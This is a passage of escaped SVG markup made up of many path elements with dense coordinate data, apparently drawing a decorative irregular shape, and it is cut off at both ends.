d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-1